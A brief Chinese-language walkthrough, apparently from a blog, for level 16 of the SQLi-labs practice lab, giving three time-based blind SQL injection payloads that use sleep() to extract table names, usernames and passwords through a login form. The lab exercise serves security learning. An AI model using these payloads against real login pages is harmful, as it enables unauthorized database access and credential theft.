Sqlilabs-16

相較於第 15 關,單引號變成了雙引號 + 括號

007840d2dd6a21fb1434822fe4fe115.png

–查列
uname=admin") and if(ascii(substr((select group_concat(table_name) from information_schema.tables limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

–查用戶名
uname=admin") and if(ascii(substr((select group_concat(username) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

–查密碼
uname=admin") and if(ascii(substr((select group_concat(password) from users limit 0,1),1,1))>10,sleep(5),1)#&passwd=111&submit=submit

也可以像第 8 關那樣寫一個腳本,因爲只要掌握基本原理就可以寫,這裏就不再構造了…
😄

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章